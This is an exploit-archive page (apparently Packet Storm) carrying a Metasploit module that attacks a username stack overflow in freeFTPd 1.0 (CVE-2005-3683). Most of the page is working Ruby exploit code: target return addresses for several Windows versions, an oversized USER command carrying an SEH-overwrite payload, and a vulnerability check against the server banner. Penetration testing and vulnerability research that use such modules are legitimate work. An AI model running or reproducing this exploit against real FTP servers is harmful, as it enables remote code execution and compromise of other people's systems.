what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

freeFTPd 1.0 Username Overflow

freeFTPd 1.0 Username Overflow
Posted Nov 26, 2009
Authored by MC | Site metasploit.com

This Metasploit module exploits a stack overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).

tags | exploit, overflow, protocol
advisories | CVE-2005-3683
SHA-256 | a90fef1d9933bd62bd7e69f739528cf5b790e9aedf6aaf27faf0c5d504272d14

freeFTPd 1.0 Username Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'freeFTPd 1.0 Username Overflow',
'Description' => %q{
This module exploits a stack overflow in the freeFTPd
multi-protocol file transfer service. This flaw can only be
exploited when logging has been enabled (non-default).

},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-3683'],
[ 'OSVDB', '20909'],
[ 'BID', '15457'],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],

],
'Privileged' => false,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Windows 2000 English ALL',
{
'Platform' => 'win',
'Ret' => 0x75022ac4,
},
],
[
'Windows XP Pro SP0/SP1 English',
{
'Platform' => 'win',
'Ret' => 0x71aa32ad,
},
],
[
'Windows NT SP5/SP6a English',
{
'Platform' => 'win',
'Ret' => 0x776a1799,
},
],
[
'Windows 2003 Server English',
{
'Platform' => 'win',
'Ret' => 0x7ffc0638,
},
],
]))
end

def check
connect
disconnect
if (banner =~ /freeFTPd 1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def exploit
connect

print_status("Trying target #{target.name}...")

buf = rand_text_english(1816, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[1008, seh.length] = seh

send_cmd( ['USER', buf] , false)

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close